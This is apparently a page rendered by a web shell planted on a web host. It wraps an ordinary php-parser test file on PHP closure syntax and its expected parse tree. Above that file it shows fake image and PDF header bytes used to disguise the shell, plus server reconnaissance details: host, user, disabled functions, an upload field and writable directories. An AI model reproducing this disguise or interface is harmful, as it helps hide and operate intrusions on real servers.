%PDF- %GIF98; %PNG; .
Cyber Programmer
Logo of a company Server : Apache
System : Linux host.digitalbabaji.in 4.18.0-513.11.1.el8_9.x86_64 #1 SMP Wed Jan 17 02:00:40 EST 2024 x86_64
User : addictionfreeind ( 1003)
PHP Version : 7.2.34
Disable Function : exec,passthru,shell_exec,system
Directory :  /home/addictionfreeind/public_html/vendor/nikic/php-parser/test/code/parser/expr/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/addictionfreeind/public_html/vendor/nikic/php-parser/test/code/parser/expr/closure.test
Closures
-----
<?php
function($a) { $a; };
function($a) use($b) {};
function() use($a, &$b) {};
function &($a) {};
static function() {};
function($a) : array {};
function() use($a) : \Foo\Bar {};
-----
array(
    0: Expr_Closure(
        static: false
        byRef: false
        params: array(
            0: Param(
                type: null
                byRef: false
                variadic: false
                name: a
                default: null
            )
        )
        uses: array(
        )
        returnType: null
        stmts: array(
            0: Expr_Variable(
                name: a
            )
        )
    )
    1: Expr_Closure(
        static: false
        byRef: false
        params: array(
            0: Param(
                type: null
                byRef: false
                variadic: false
                name: a
                default: null
            )
        )
        uses: array(
            0: Expr_ClosureUse(
                var: b
                byRef: false
            )
        )
        returnType: null
        stmts: array(
        )
    )
    2: Expr_Closure(
        static: false
        byRef: false
        params: array(
        )
        uses: array(
            0: Expr_ClosureUse(
                var: a
                byRef: false
            )
            1: Expr_ClosureUse(
                var: b
                byRef: true
            )
        )
        returnType: null
        stmts: array(
        )
    )
    3: Expr_Closure(
        static: false
        byRef: true
        params: array(
            0: Param(
                type: null
                byRef: false
                variadic: false
                name: a
                default: null
            )
        )
        uses: array(
        )
        returnType: null
        stmts: array(
        )
    )
    4: Expr_Closure(
        static: true
        byRef: false
        params: array(
        )
        uses: array(
        )
        returnType: null
        stmts: array(
        )
    )
    5: Expr_Closure(
        static: false
        byRef: false
        params: array(
            0: Param(
                type: null
                byRef: false
                variadic: false
                name: a
                default: null
            )
        )
        uses: array(
        )
        returnType: array
        stmts: array(
        )
    )
    6: Expr_Closure(
        static: false
        byRef: false
        params: array(
        )
        uses: array(
            0: Expr_ClosureUse(
                var: a
                byRef: false
            )
        )
        returnType: Name_FullyQualified(
            parts: array(
                0: Foo
                1: Bar
            )
        )
        stmts: array(
        )
    )
)

VaKeR 2022